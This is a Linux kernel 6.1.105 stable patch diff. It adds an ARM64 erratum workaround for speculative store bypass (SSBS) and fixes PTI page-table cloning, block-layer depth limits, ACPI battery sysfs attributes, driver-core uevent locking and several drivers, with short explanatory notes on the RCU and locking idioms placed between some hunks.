+ | ARM            | Neoverse-N2     | #2253138        | ARM64_ERRATUM_2253138       |
+ +----------------+-----------------+-----------------+-----------------------------+
++| ARM            | Neoverse-N2     | #3324339        | ARM64_ERRATUM_3194386       |
+++----------------+-----------------+-----------------+-----------------------------+
++| ARM            | Neoverse-V1     | #3324341        | ARM64_ERRATUM_3194386       |
+++----------------+-----------------+-----------------+-----------------------------+
++| ARM            | Neoverse-V2     | #3324336        | ARM64_ERRATUM_3194386       |
+++----------------+-----------------+-----------------+-----------------------------+
++| ARM            | Neoverse-V3     | #3312417        | ARM64_ERRATUM_3194386       |
+++----------------+-----------------+-----------------+-----------------------------+
+ | ARM            | MMU-500         | #841119,826419  | N/A                         |
+ +----------------+-----------------+-----------------+-----------------------------+
+ | ARM            | MMU-600         | #1076982,1209401| N/A                         |
+diff --git a/Makefile b/Makefile
+index 0dd963d6d8d26..08ca316cb46dc 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 104
++SUBLEVEL = 105
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/arm64/Kconfig b/arch/arm64/Kconfig
+index 044b98a62f7bb..2ef939075039d 100644
+--- a/arch/arm64/Kconfig
++++ b/arch/arm64/Kconfig
+@@ -1000,6 +1000,44 @@ config ARM64_ERRATUM_2966298
+ 
+ 	  If unsure, say Y.
+ 
++config ARM64_ERRATUM_3194386
++	bool "Cortex-*/Neoverse-*: workaround for MSR SSBS not self-synchronizing"
++	default y
++	help
++	  This option adds the workaround for the following errata:
++
++	  * ARM Cortex-A76 erratum 3324349
++	  * ARM Cortex-A77 erratum 3324348
++	  * ARM Cortex-A78 erratum 3324344
++	  * ARM Cortex-A78C erratum 3324346
++	  * ARM Cortex-A78C erratum 3324347
++	  * ARM Cortex-A710 erratum 3324338
++	  * ARM Cortex-A720 erratum 3456091
++	  * ARM Cortex-A725 erratum 3456106
++	  * ARM Cortex-X1 erratum 3324344
++	  * ARM Cortex-X1C erratum 3324346
++	  * ARM Cortex-X2 erratum 3324338
++	  * ARM Cortex-X3 erratum 3324335
++	  * ARM Cortex-X4 erratum 3194386
++	  * ARM Cortex-X925 erratum 3324334
++	  * ARM Neoverse-N1 erratum 3324349
++	  * ARM Neoverse N2 erratum 3324339
++	  * ARM Neoverse-V1 erratum 3324341
++	  * ARM Neoverse V2 erratum 3324336
++	  * ARM Neoverse-V3 erratum 3312417
++
++	  On affected cores "MSR SSBS, #0" instructions may not affect
++	  subsequent speculative instructions, which may permit unexpected
++	  speculative store bypassing.
++
++	  Work around this problem by placing a Speculation Barrier (SB) or
++	  Instruction Synchronization Barrier (ISB) after kernel changes to
++	  SSBS. The presence of the SSBS special-purpose register is hidden
++	  from hwcaps and EL0 reads of ID_AA64PFR1_EL1, such that userspace
++	  will use the PR_SPEC_STORE_BYPASS prctl to change SSBS.
++
++	  If unsure, say Y.
++
+ config CAVIUM_ERRATUM_22375
+ 	bool "Cavium erratum 22375, 24313"
+ 	default y
+diff --git a/arch/arm64/include/asm/barrier.h b/arch/arm64/include/asm/barrier.h
+index 2cfc4245d2e2d..e22ec44d50f5f 100644
+--- a/arch/arm64/include/asm/barrier.h
++++ b/arch/arm64/include/asm/barrier.h
+@@ -38,6 +38,10 @@
+  */
+ #define dgh()		asm volatile("hint #6" : : : "memory")
+ 
++#define spec_bar()	asm volatile(ALTERNATIVE("dsb nsh\nisb\n",		\
++						 SB_BARRIER_INSN"nop\n",	\
++						 ARM64_HAS_SB))
++
+ #ifdef CONFIG_ARM64_PSEUDO_NMI
+ #define pmr_sync()						\
+ 	do {							\
+diff --git a/arch/arm64/include/asm/cputype.h b/arch/arm64/include/asm/cputype.h
+index af3a678a76b3a..a0a028a6b9670 100644
+--- a/arch/arm64/include/asm/cputype.h
++++ b/arch/arm64/include/asm/cputype.h
+@@ -85,6 +85,14 @@
+ #define ARM_CPU_PART_CORTEX_X2		0xD48
+ #define ARM_CPU_PART_NEOVERSE_N2	0xD49
+ #define ARM_CPU_PART_CORTEX_A78C	0xD4B
++#define ARM_CPU_PART_CORTEX_X1C		0xD4C
++#define ARM_CPU_PART_CORTEX_X3		0xD4E
++#define ARM_CPU_PART_NEOVERSE_V2	0xD4F
++#define ARM_CPU_PART_CORTEX_A720	0xD81
++#define ARM_CPU_PART_CORTEX_X4		0xD82
++#define ARM_CPU_PART_NEOVERSE_V3	0xD84
++#define ARM_CPU_PART_CORTEX_X925	0xD85
++#define ARM_CPU_PART_CORTEX_A725	0xD87
+ 
+ #define APM_CPU_PART_XGENE		0x000
+ #define APM_CPU_VAR_POTENZA		0x00
+@@ -151,6 +159,14 @@
+ #define MIDR_CORTEX_X2 MIDR_CPU_MODEL(ARM_CPU_IMP_ARM, ARM_CPU_PART_CORTEX_X2)
+ #define MIDR_NEOVERSE_N2 MIDR_CPU_MODEL(ARM_CPU_IMP_ARM, ARM_CPU_PART_NEOVERSE_N2)
+ #define MIDR_CORTEX_A78C	MIDR_CPU_MODEL(ARM_CPU_IMP_ARM, ARM_CPU_PART_CORTEX_A78C)
++#define MIDR_CORTEX_X1C	MIDR_CPU_MODEL(ARM_CPU_IMP_ARM, ARM_CPU_PART_CORTEX_X1C)
++#define MIDR_CORTEX_X3 MIDR_CPU_MODEL(ARM_CPU_IMP_ARM, ARM_CPU_PART_CORTEX_X3)
++#define MIDR_NEOVERSE_V2 MIDR_CPU_MODEL(ARM_CPU_IMP_ARM, ARM_CPU_PART_NEOVERSE_V2)
++#define MIDR_CORTEX_A720 MIDR_CPU_MODEL(ARM_CPU_IMP_ARM, ARM_CPU_PART_CORTEX_A720)
++#define MIDR_CORTEX_X4 MIDR_CPU_MODEL(ARM_CPU_IMP_ARM, ARM_CPU_PART_CORTEX_X4)
++#define MIDR_NEOVERSE_V3 MIDR_CPU_MODEL(ARM_CPU_IMP_ARM, ARM_CPU_PART_NEOVERSE_V3)
++#define MIDR_CORTEX_X925 MIDR_CPU_MODEL(ARM_CPU_IMP_ARM, ARM_CPU_PART_CORTEX_X925)
++#define MIDR_CORTEX_A725 MIDR_CPU_MODEL(ARM_CPU_IMP_ARM, ARM_CPU_PART_CORTEX_A725)
+ #define MIDR_THUNDERX	MIDR_CPU_MODEL(ARM_CPU_IMP_CAVIUM, CAVIUM_CPU_PART_THUNDERX)
+ #define MIDR_THUNDERX_81XX MIDR_CPU_MODEL(ARM_CPU_IMP_CAVIUM, CAVIUM_CPU_PART_THUNDERX_81XX)
+ #define MIDR_THUNDERX_83XX MIDR_CPU_MODEL(ARM_CPU_IMP_CAVIUM, CAVIUM_CPU_PART_THUNDERX_83XX)
+diff --git a/arch/arm64/kernel/cpu_errata.c b/arch/arm64/kernel/cpu_errata.c
+index 74584597bfb82..7640031e1b845 100644
+--- a/arch/arm64/kernel/cpu_errata.c
++++ b/arch/arm64/kernel/cpu_errata.c
+@@ -435,6 +435,30 @@ static struct midr_range broken_aarch32_aes[] = {
+ };
+ #endif /* CONFIG_ARM64_WORKAROUND_TRBE_WRITE_OUT_OF_RANGE */
+ 
++#ifdef CONFIG_ARM64_ERRATUM_3194386
++static const struct midr_range erratum_spec_ssbs_list[] = {
++	MIDR_ALL_VERSIONS(MIDR_CORTEX_A76),
++	MIDR_ALL_VERSIONS(MIDR_CORTEX_A77),
++	MIDR_ALL_VERSIONS(MIDR_CORTEX_A78),
++	MIDR_ALL_VERSIONS(MIDR_CORTEX_A78C),
++	MIDR_ALL_VERSIONS(MIDR_CORTEX_A710),
++	MIDR_ALL_VERSIONS(MIDR_CORTEX_A720),
++	MIDR_ALL_VERSIONS(MIDR_CORTEX_A725),
++	MIDR_ALL_VERSIONS(MIDR_CORTEX_X1),
++	MIDR_ALL_VERSIONS(MIDR_CORTEX_X1C),
++	MIDR_ALL_VERSIONS(MIDR_CORTEX_X2),
++	MIDR_ALL_VERSIONS(MIDR_CORTEX_X3),
++	MIDR_ALL_VERSIONS(MIDR_CORTEX_X4),
++	MIDR_ALL_VERSIONS(MIDR_CORTEX_X925),
++	MIDR_ALL_VERSIONS(MIDR_NEOVERSE_N1),
++	MIDR_ALL_VERSIONS(MIDR_NEOVERSE_N2),
++	MIDR_ALL_VERSIONS(MIDR_NEOVERSE_V1),
++	MIDR_ALL_VERSIONS(MIDR_NEOVERSE_V2),
++	MIDR_ALL_VERSIONS(MIDR_NEOVERSE_V3),
++	{}
++};
++#endif
++
+ const struct arm64_cpu_capabilities arm64_errata[] = {
+ #ifdef CONFIG_ARM64_WORKAROUND_CLEAN_CACHE
+ 	{
+@@ -726,6 +750,13 @@ const struct arm64_cpu_capabilities arm64_errata[] = {
+ 		.cpu_enable = cpu_clear_bf16_from_user_emulation,
+ 	},
+ #endif
++#ifdef CONFIG_ARM64_ERRATUM_3194386
++	{
++		.desc = "SSBS not fully self-synchronizing",
++		.capability = ARM64_WORKAROUND_SPECULATIVE_SSBS,
++		ERRATA_MIDR_RANGE_LIST(erratum_spec_ssbs_list),
++	},
++#endif
+ #ifdef CONFIG_ARM64_WORKAROUND_SPECULATIVE_UNPRIV_LOAD
+ 	{
+ 		.desc = "ARM erratum 2966298",
+diff --git a/arch/arm64/kernel/cpufeature.c b/arch/arm64/kernel/cpufeature.c
+index 770a31c6ed81b..840cc48b5147b 100644
+--- a/arch/arm64/kernel/cpufeature.c
++++ b/arch/arm64/kernel/cpufeature.c
+@@ -2084,6 +2084,17 @@ static void cpu_enable_mte(struct arm64_cpu_capabilities const *cap)
+ }
+ #endif /* CONFIG_ARM64_MTE */
+ 
++static void user_feature_fixup(void)
++{
++	if (cpus_have_cap(ARM64_WORKAROUND_SPECULATIVE_SSBS)) {
++		struct arm64_ftr_reg *regp;
++
++		regp = get_arm64_ftr_reg(SYS_ID_AA64PFR1_EL1);
++		if (regp)
++			regp->user_mask &= ~ID_AA64PFR1_EL1_SSBS_MASK;
++	}
++}
++
+ static void elf_hwcap_fixup(void)
+ {
+ #ifdef CONFIG_ARM64_ERRATUM_1742098
+@@ -3284,6 +3295,7 @@ void __init setup_cpu_features(void)
+ 	u32 cwg;
+ 
+ 	setup_system_capabilities();
++	user_feature_fixup();
+ 	setup_elf_hwcaps(arm64_elf_hwcaps);
+ 
+ 	if (system_supports_32bit_el0()) {
+diff --git a/arch/arm64/kernel/proton-pack.c b/arch/arm64/kernel/proton-pack.c
+index bfce41c2a53b3..2df5e43ae4d14 100644
+--- a/arch/arm64/kernel/proton-pack.c
++++ b/arch/arm64/kernel/proton-pack.c
+@@ -570,6 +570,18 @@ static enum mitigation_state spectre_v4_enable_hw_mitigation(void)
+ 
+ 	/* SCTLR_EL1.DSSBS was initialised to 0 during boot */
+ 	set_pstate_ssbs(0);
++
++	/*
++	 * SSBS is self-synchronizing and is intended to affect subsequent
++	 * speculative instructions, but some CPUs can speculate with a stale
++	 * value of SSBS.
++	 *
++	 * Mitigate this with an unconditional speculation barrier, as CPUs
++	 * could mis-speculate branches and bypass a conditional barrier.
++	 */
++	if (IS_ENABLED(CONFIG_ARM64_ERRATUM_3194386))
++		spec_bar();
++
+ 	return SPECTRE_MITIGATED;
+ }
+ 
+diff --git a/arch/arm64/tools/cpucaps b/arch/arm64/tools/cpucaps
+index 2dc7ddee5f044..f5c9a4f5f7226 100644
+--- a/arch/arm64/tools/cpucaps
++++ b/arch/arm64/tools/cpucaps
+@@ -86,4 +86,5 @@ WORKAROUND_NVIDIA_CARMEL_CNP
+ WORKAROUND_QCOM_FALKOR_E1003
+ WORKAROUND_REPEAT_TLBI
+ WORKAROUND_SPECULATIVE_AT
++WORKAROUND_SPECULATIVE_SSBS
+ WORKAROUND_SPECULATIVE_UNPRIV_LOAD
+diff --git a/arch/x86/kernel/cpu/mtrr/mtrr.c b/arch/x86/kernel/cpu/mtrr/mtrr.c
+index 2746cac9d8a94..dbebb646c9fc6 100644
+--- a/arch/x86/kernel/cpu/mtrr/mtrr.c
++++ b/arch/x86/kernel/cpu/mtrr/mtrr.c
+@@ -816,7 +816,7 @@ void mtrr_save_state(void)
+ {
+ 	int first_cpu;
+ 
+-	if (!mtrr_enabled())
++	if (!mtrr_enabled() || !mtrr_state.have_fixed)
+ 		return;
+ 
+ 	first_cpu = cpumask_first(cpu_online_mask);
+diff --git a/arch/x86/mm/pti.c b/arch/x86/mm/pti.c
+index 78414c6d1b5ed..7b804c34c0201 100644
+--- a/arch/x86/mm/pti.c
++++ b/arch/x86/mm/pti.c
+@@ -374,14 +374,14 @@ pti_clone_pgtable(unsigned long start, unsigned long end,
+ 			 */
+ 			*target_pmd = *pmd;
+ 
+-			addr += PMD_SIZE;
++			addr = round_up(addr + 1, PMD_SIZE);
+ 
+ 		} else if (level == PTI_CLONE_PTE) {
+ 
+ 			/* Walk the page-table down to the pte level */
+ 			pte = pte_offset_kernel(pmd, addr);
+ 			if (pte_none(*pte)) {
+-				addr += PAGE_SIZE;
++				addr = round_up(addr + 1, PAGE_SIZE);
+ 				continue;
+ 			}
+ 
+@@ -401,7 +401,7 @@ pti_clone_pgtable(unsigned long start, unsigned long end,
+ 			/* Clone the PTE */
+ 			*target_pte = *pte;
+ 
+-			addr += PAGE_SIZE;
++			addr = round_up(addr + 1, PAGE_SIZE);
+ 
+ 		} else {
+ 			BUG();
+@@ -496,7 +496,7 @@ static void pti_clone_entry_text(void)
+ {
+ 	pti_clone_pgtable((unsigned long) __entry_text_start,
+ 			  (unsigned long) __entry_text_end,
+-			  PTI_CLONE_PMD);
++			  PTI_LEVEL_KERNEL_IMAGE);
+ }
+ 
+ /*
+diff --git a/block/blk-mq.c b/block/blk-mq.c
+index 3afa5c8d165b1..daf0e4f3444e7 100644
+--- a/block/blk-mq.c
++++ b/block/blk-mq.c
+@@ -439,6 +439,7 @@ __blk_mq_alloc_requests_batch(struct blk_mq_alloc_data *data,
+ 
+ static struct request *__blk_mq_alloc_requests(struct blk_mq_alloc_data *data)
+ {
++	void (*limit_depth)(blk_opf_t, struct blk_mq_alloc_data *) = NULL;
+ 	struct request_queue *q = data->q;
+ 	u64 alloc_time_ns = 0;
+ 	struct request *rq;
+@@ -465,7 +466,7 @@ static struct request *__blk_mq_alloc_requests(struct blk_mq_alloc_data *data)
+ 		    !blk_op_is_passthrough(data->cmd_flags) &&
+ 		    e->type->ops.limit_depth &&
+ 		    !(data->flags & BLK_MQ_REQ_RESERVED))
+-			e->type->ops.limit_depth(data->cmd_flags, data);
++			limit_depth = e->type->ops.limit_depth;
+ 	}
+ 
+ retry:
+@@ -477,6 +478,9 @@ static struct request *__blk_mq_alloc_requests(struct blk_mq_alloc_data *data)
+ 	if (data->flags & BLK_MQ_REQ_RESERVED)
+ 		data->rq_flags |= RQF_RESV;
+ 
++	if (limit_depth)
++		limit_depth(data->cmd_flags, data);
++
+ 	/*
+ 	 * Try batched alloc if we want more than 1 tag.
+ 	 */
+diff --git a/block/mq-deadline.c b/block/mq-deadline.c
+index f10c2a0d18d41..ff029e1acc4d5 100644
+--- a/block/mq-deadline.c
++++ b/block/mq-deadline.c
+@@ -597,6 +597,20 @@ static struct request *dd_dispatch_request(struct blk_mq_hw_ctx *hctx)
+ 	return rq;
+ }
+ 
++/*
++ * 'depth' is a number in the range 1..INT_MAX representing a number of
++ * requests. Scale it with a factor (1 << bt->sb.shift) / q->nr_requests since
++ * 1..(1 << bt->sb.shift) is the range expected by sbitmap_get_shallow().
++ * Values larger than q->nr_requests have the same effect as q->nr_requests.
++ */
++static int dd_to_word_depth(struct blk_mq_hw_ctx *hctx, unsigned int qdepth)
++{
++	struct sbitmap_queue *bt = &hctx->sched_tags->bitmap_tags;
++	const unsigned int nrr = hctx->queue->nr_requests;
++
++	return ((qdepth << bt->sb.shift) + nrr - 1) / nrr;
++}
++
+ /*
+  * Called by __blk_mq_alloc_request(). The shallow_depth value set by this
+  * function is used by __blk_mq_get_tag().
+@@ -613,7 +627,7 @@ static void dd_limit_depth(blk_opf_t opf, struct blk_mq_alloc_data *data)
+ 	 * Throttle asynchronous requests and writes such that these requests
+ 	 * do not block the allocation of synchronous requests.
+ 	 */
+-	data->shallow_depth = dd->async_depth;
++	data->shallow_depth = dd_to_word_depth(data->hctx, dd->async_depth);
+ }
+ 
+ /* Called by blk_mq_update_nr_requests(). */
+@@ -623,9 +637,9 @@ static void dd_depth_updated(struct blk_mq_hw_ctx *hctx)
+ 	struct deadline_data *dd = q->elevator->elevator_data;
+ 	struct blk_mq_tags *tags = hctx->sched_tags;
+ 
+-	dd->async_depth = max(1UL, 3 * q->nr_requests / 4);
++	dd->async_depth = q->nr_requests;
+ 
+-	sbitmap_queue_min_shallow_depth(&tags->bitmap_tags, dd->async_depth);
++	sbitmap_queue_min_shallow_depth(&tags->bitmap_tags, 1);
+ }
+ 
+ /* Called by blk_mq_init_hctx() and blk_mq_init_sched(). */
+diff --git a/drivers/acpi/battery.c b/drivers/acpi/battery.c
+index 084f156bdfbc4..088740fdea355 100644
+--- a/drivers/acpi/battery.c
++++ b/drivers/acpi/battery.c
+@@ -667,12 +667,18 @@ static ssize_t acpi_battery_alarm_store(struct device *dev,
+ 	return count;
+ }
+ 
+-static const struct device_attribute alarm_attr = {
++static struct device_attribute alarm_attr = {
+ 	.attr = {.name = "alarm", .mode = 0644},
+ 	.show = acpi_battery_alarm_show,
+ 	.store = acpi_battery_alarm_store,
+ };
+ 
++static struct attribute *acpi_battery_attrs[] = {
++	&alarm_attr.attr,
++	NULL
++};
++ATTRIBUTE_GROUPS(acpi_battery);
++
+ /*
+  * The Battery Hooking API
+  *
+@@ -809,7 +815,10 @@ static void __exit battery_hook_exit(void)
+ 
+ static int sysfs_add_battery(struct acpi_battery *battery)
+ {
+-	struct power_supply_config psy_cfg = { .drv_data = battery, };
++	struct power_supply_config psy_cfg = {
++		.drv_data = battery,
++		.attr_grp = acpi_battery_groups,
++	};
+ 	bool full_cap_broken = false;
+ 
+ 	if (!ACPI_BATTERY_CAPACITY_VALID(battery->full_charge_capacity) &&
+@@ -854,7 +863,7 @@ static int sysfs_add_battery(struct acpi_battery *battery)
+ 		return result;
+ 	}
+ 	battery_hook_add_battery(battery);
+-	return device_create_file(&battery->bat->dev, &alarm_attr);
++	return 0;
+ }
+ 
+ static void sysfs_remove_battery(struct acpi_battery *battery)
+@@ -865,7 +874,6 @@ static void sysfs_remove_battery(struct acpi_battery *battery)
+ 		return;
+ 	}
+ 	battery_hook_remove_battery(battery);
+-	device_remove_file(&battery->bat->dev, &alarm_attr);
+ 	power_supply_unregister(battery->bat);
+ 	battery->bat = NULL;
+ 	mutex_unlock(&battery->sysfs_lock);
+diff --git a/drivers/acpi/sbs.c b/drivers/acpi/sbs.c
+index e6a01a8df1b81..7c0eba1a37d87 100644
+--- a/drivers/acpi/sbs.c
++++ b/drivers/acpi/sbs.c
+@@ -77,7 +77,6 @@ struct acpi_battery {
+ 	u16 spec;
+ 	u8 id;
+ 	u8 present:1;
+-	u8 have_sysfs_alarm:1;
+ };
+ 
+ #define to_acpi_battery(x) power_supply_get_drvdata(x)
+@@ -462,12 +461,18 @@ static ssize_t acpi_battery_alarm_store(struct device *dev,
+ 	return count;
+ }
+ 
+-static const struct device_attribute alarm_attr = {
++static struct device_attribute alarm_attr = {
+ 	.attr = {.name = "alarm", .mode = 0644},
+ 	.show = acpi_battery_alarm_show,
+ 	.store = acpi_battery_alarm_store,
+ };
+ 
++static struct attribute *acpi_battery_attrs[] = {
++	&alarm_attr.attr,
++	NULL
++};
++ATTRIBUTE_GROUPS(acpi_battery);
++
+ /* --------------------------------------------------------------------------
+                                  Driver Interface
+    -------------------------------------------------------------------------- */
+@@ -509,7 +514,10 @@ static int acpi_battery_read(struct acpi_battery *battery)
+ static int acpi_battery_add(struct acpi_sbs *sbs, int id)
+ {
+ 	struct acpi_battery *battery = &sbs->battery[id];
+-	struct power_supply_config psy_cfg = { .drv_data = battery, };
++	struct power_supply_config psy_cfg = {
++		.drv_data = battery,
++		.attr_grp = acpi_battery_groups,
++	};
+ 	int result;
+ 
+ 	battery->id = id;
+@@ -539,10 +547,6 @@ static int acpi_battery_add(struct acpi_sbs *sbs, int id)
+ 		goto end;
+ 	}
+ 
+-	result = device_create_file(&battery->bat->dev, &alarm_attr);
+-	if (result)
+-		goto end;
+-	battery->have_sysfs_alarm = 1;
+       end:
+ 	pr_info("%s [%s]: Battery Slot [%s] (battery %s)\n",
+ 	       ACPI_SBS_DEVICE_NAME, acpi_device_bid(sbs->device),
+@@ -554,11 +558,8 @@ static void acpi_battery_remove(struct acpi_sbs *sbs, int id)
+ {
+ 	struct acpi_battery *battery = &sbs->battery[id];
+ 
+-	if (battery->bat) {
+-		if (battery->have_sysfs_alarm)
+-			device_remove_file(&battery->bat->dev, &alarm_attr);
++	if (battery->bat)
+ 		power_supply_unregister(battery->bat);
+-	}
+ }
+ 
+ static int acpi_charger_add(struct acpi_sbs *sbs)
+diff --git a/drivers/base/core.c b/drivers/base/core.c
+index 30204e62497c2..1de19cecaa622 100644
+--- a/drivers/base/core.c
++++ b/drivers/base/core.c
+@@ -25,6 +25,7 @@
+ #include <linux/mutex.h>
+ #include <linux/pm_runtime.h>
+ #include <linux/netdevice.h>
++#include <linux/rcupdate.h>
+ #include <linux/sched/signal.h>
+ #include <linux/sched/mm.h>
+ #include <linux/swiotlb.h>
+@@ -2558,6 +2559,7 @@ static const char *dev_uevent_name(struct kobject *kobj)
+ static int dev_uevent(struct kobject *kobj, struct kobj_uevent_env *env)
+ {
+ 	struct device *dev = kobj_to_dev(kobj);
++	struct device_driver *driver;
+ 	int retval = 0;
+ 
+ 	/* add device node properties if present */
+@@ -2586,8 +2588,12 @@ static int dev_uevent(struct kobject *kobj, struct kobj_uevent_env *env)
+ 	if (dev->type && dev->type->name)
+ 		add_uevent_var(env, "DEVTYPE=%s", dev->type->name);
+ 
+-	if (dev->driver)
+-		add_uevent_var(env, "DRIVER=%s", dev->driver->name);
++	/* Synchronize with module_remove_driver() */
++	rcu_read_lock();
++	driver = READ_ONCE(dev->driver);
++	if (driver)
++		add_uevent_var(env, "DRIVER=%s", driver->name);
++	rcu_read_unlock();
+ 
+ 	/* Add common DT information about the device */
+ 	of_device_uevent(dev, env);
+@@ -2657,11 +2663,8 @@ static ssize_t uevent_show(struct device *dev, struct device_attribute *attr,
+ 	if (!env)
+ 		return -ENOMEM;
+ 
+-	/* Synchronize with really_probe() */
+-	device_lock(dev);
+ 	/* let the kset specific function add its keys */
+ 	retval = kset->uevent_ops->uevent(&dev->kobj, env);
+-	device_unlock(dev);
+ 	if (retval)
+ 		goto out;
+ 
+diff --git a/drivers/base/module.c b/drivers/base/module.c
+index 46ad4d636731d..851cc5367c04c 100644
+--- a/drivers/base/module.c
++++ b/drivers/base/module.c
+@@ -7,6 +7,7 @@
+ #include <linux/errno.h>
+ #include <linux/slab.h>
+ #include <linux/string.h>
++#include <linux/rcupdate.h>
+ #include "base.h"
+ 
+ static char *make_driver_name(struct device_driver *drv)
+@@ -77,6 +78,9 @@ void module_remove_driver(struct device_driver *drv)
+ 	if (!drv)
+ 		return;
+ 
++	/* Synchronize with dev_uevent() */
++	synchronize_rcu();
++
+ 	sysfs_remove_link(&drv->p->kobj, "module");
+ 
+ 	if (drv->owner)
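
The dev_uevent()/module_remove_driver() pairing above is the standard RCU read/update pattern: the reader samples the pointer inside rcu_read_lock(), and the updater waits out all such readers with synchronize_rcu() before the driver can go away. A minimal sketch of the idiom, with hypothetical names rather than the driver-core code itself:

#include <linux/printk.h>
#include <linux/rcupdate.h>
#include <linux/slab.h>

struct obj {
	char name[16];
};

static struct obj __rcu *shared;

/* Reader side: cheap, never blocks the updater. */
static void reader(void)
{
	struct obj *o;

	rcu_read_lock();
	o = rcu_dereference(shared);
	if (o)
		pr_info("name=%s\n", o->name);
	rcu_read_unlock();
}

/* Update side: unpublish first, then wait out the readers. */
static void retire(void)
{
	struct obj *old = rcu_dereference_protected(shared, true);

	rcu_assign_pointer(shared, NULL);
	synchronize_rcu();	/* no reader can still see 'old' after this */
	kfree(old);
}

In the patch, dev->driver is not __rcu-annotated, hence the READ_ONCE() in dev_uevent(); the synchronize_rcu() in module_remove_driver() still guarantees that a concurrent uevent sees either the still-valid driver or NULL, and that guarantee is what lets uevent_show() drop device_lock().
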
+diff --git a/drivers/bus/mhi/host/pci_generic.c b/drivers/bus/mhi/host/pci_generic.c
+index caa4ce28cf9e5..d01080b21da6e 100644
+--- a/drivers/bus/mhi/host/pci_generic.c
++++ b/drivers/bus/mhi/host/pci_generic.c
+@@ -553,6 +553,9 @@ static const struct pci_device_id mhi_pci_id_table[] = {
+ 	/* Telit FN990 */
+ 	{ PCI_DEVICE_SUB(PCI_VENDOR_ID_QCOM, 0x0308, 0x1c5d, 0x2010),
+ 		.driver_data = (kernel_ulong_t) &mhi_telit_fn990_info },
++	/* Telit FE990 */
++	{ PCI_DEVICE_SUB(PCI_VENDOR_ID_QCOM, 0x0308, 0x1c5d, 0x2015),
++		.driver_data = (kernel_ulong_t) &mhi_telit_fn990_info },
+ 	{ PCI_DEVICE(PCI_VENDOR_ID_QCOM, 0x0308),
+ 		.driver_data = (kernel_ulong_t) &mhi_qcom_sdx65_info },
+ 	{ PCI_DEVICE(0x1eac, 0x1001), /* EM120R-GL (sdx24) */
+diff --git a/drivers/clocksource/sh_cmt.c b/drivers/clocksource/sh_cmt.c
+index 7b952aa52c0b9..7a2b83157bf5f 100644
+--- a/drivers/clocksource/sh_cmt.c
++++ b/drivers/clocksource/sh_cmt.c
+@@ -529,6 +529,7 @@ static void sh_cmt_set_next(struct sh_cmt_channel *ch, unsigned long delta)
+ static irqreturn_t sh_cmt_interrupt(int irq, void *dev_id)
+ {
+ 	struct sh_cmt_channel *ch = dev_id;
++	unsigned long flags;
+ 
+ 	/* clear flags */
+ 	sh_cmt_write_cmcsr(ch, sh_cmt_read_cmcsr(ch) &
+@@ -559,6 +560,8 @@ static irqreturn_t sh_cmt_interrupt(int irq, void *dev_id)
+ 
+ 	ch->flags &= ~FLAG_SKIPEVENT;
+ 
++	raw_spin_lock_irqsave(&ch->lock, flags);
++
+ 	if (ch->flags & FLAG_REPROGRAM) {
+ 		ch->flags &= ~FLAG_REPROGRAM;
+ 		sh_cmt_clock_event_program_verify(ch, 1);
+@@ -571,6 +574,8 @@ static irqreturn_t sh_cmt_interrupt(int irq, void *dev_id)
+ 
+ 	ch->flags &= ~FLAG_IRQCONTEXT;
+ 
++	raw_spin_unlock_irqrestore(&ch->lock, flags);
++
+ 	return IRQ_HANDLED;
+ }
+ 
+@@ -781,12 +786,18 @@ static int sh_cmt_clock_event_next(unsigned long delta,
+ 				   struct clock_event_device *ced)
+ {
+ 	struct sh_cmt_channel *ch = ced_to_sh_cmt(ced);
++	unsigned long flags;
+ 
+ 	BUG_ON(!clockevent_state_oneshot(ced));
++
++	raw_spin_lock_irqsave(&ch->lock, flags);
++
+ 	if (likely(ch->flags & FLAG_IRQCONTEXT))
+ 		ch->next_match_value = delta - 1;
+ 	else
+-		sh_cmt_set_next(ch, delta - 1);
++		__sh_cmt_set_next(ch, delta - 1);
++
++	raw_spin_unlock_irqrestore(&ch->lock, flags);
+ 
+ 	return 0;
+ }
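
The sh_cmt hunks rely on the common locked/unlocked helper split: sh_cmt_set_next() takes ch->lock itself, so sh_cmt_clock_event_next(), which now holds the lock across the FLAG_IRQCONTEXT test, has to call the lock-free __sh_cmt_set_next() variant instead. The shape of the idiom, as a sketch with placeholder names rather than the driver code:

#include <linux/spinlock.h>

struct ch {
	raw_spinlock_t lock;
	unsigned long next_match_value;
};

/* Variant for callers that already hold ch->lock. */
static void __set_next(struct ch *ch, unsigned long delta)
{
	lockdep_assert_held(&ch->lock);
	ch->next_match_value = delta;	/* stand-in for programming the hw */
}

/* Variant for lockless callers: takes the lock, then delegates. */
static void set_next(struct ch *ch, unsigned long delta)
{
	unsigned long flags;

	raw_spin_lock_irqsave(&ch->lock, flags);
	__set_next(ch, delta);
	raw_spin_unlock_irqrestore(&ch->lock, flags);
}
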
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+index d4faa489bd5fa..4d1c2eb63090f 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+@@ -3631,6 +3631,7 @@ int amdgpu_device_init(struct amdgpu_device *adev,
+ 	mutex_init(&adev->grbm_idx_mutex);
+ 	mutex_init(&adev->mn_lock);
+ 	mutex_init(&adev->virt.vf_errors.lock);
++	mutex_init(&adev->virt.rlcg_reg_lock);
+ 	hash_init(adev->mn_hash);
+ 	mutex_init(&adev->psp.mutex);
+ 	mutex_init(&adev->notifier_lock);
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_ras.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_ras.c
+index ee83d282b49a8..4b7b3278a05f1 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_ras.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_ras.c
+@@ -1679,12 +1679,15 @@ static void amdgpu_ras_interrupt_process_handler(struct work_struct *work)
+ int amdgpu_ras_interrupt_dispatch(struct amdgpu_device *adev,
+ 		struct ras_dispatch_if *info)
+ {
+-	struct ras_manager *obj = amdgpu_ras_find_obj(adev, &info->head);
+-	struct ras_ih_data *data = &obj->ih_data;
++	struct ras_manager *obj;
++	struct ras_ih_data *data;
+ 
++	obj = amdgpu_ras_find_obj(adev, &info->head);
+ 	if (!obj)
+ 		return -EINVAL;
+ 
++	data = &obj->ih_data;
++
+ 	if (data->inuse == 0)
+ 		return 0;
+ 
